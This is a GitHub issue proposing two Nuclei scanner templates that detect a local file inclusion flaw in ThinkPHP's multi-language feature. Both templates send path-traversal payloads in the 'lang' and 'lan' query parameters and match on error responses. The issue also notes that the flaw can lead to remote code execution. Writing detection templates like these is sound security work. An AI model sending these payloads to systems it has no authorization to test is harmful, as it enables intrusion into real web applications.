### ISSUE TITLE
thinkphp_lang_lfi

### ISSUE THREAD

**Issue by KagamigawaMeguri** [projectdiscovery/nuclei-templates#6354]
### Template Information:

LFI or RCE about Thinkphp's Multi-Language features, 
support：`v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24. `
For details, see https://tttang.com/archive/1865/.

### Nuclei Template:

```yaml
id: thinkphp6_lang_lfi

info:
  name: Thinkphp lang LFI
  author: kagamigawa
  severity: high
  description: Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24. For details, see https://tttang.com/archive/1865/.
  tags: thinkphp, lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?lan=../../../../../vendor/topthink/think-trace/src/TraceDebug"
      - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2==500 && contains(tolower(body_2), '#f7f7f7')"
```

```yaml
id: thinkphp5_lang_lfi

info:
  name: Thinkphp lang LFI
  author: kagamigawa
  severity: high
  description: Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24. For details, see https://tttang.com/archive/1865/.
  tags: thinkphp, lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?lan=../../thinkphp/base"
      - "{{BaseURL}}/?lang=../../thinkphp/base"
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2==500 && contains(tolower(body_2), '#f7f7f7')"
```
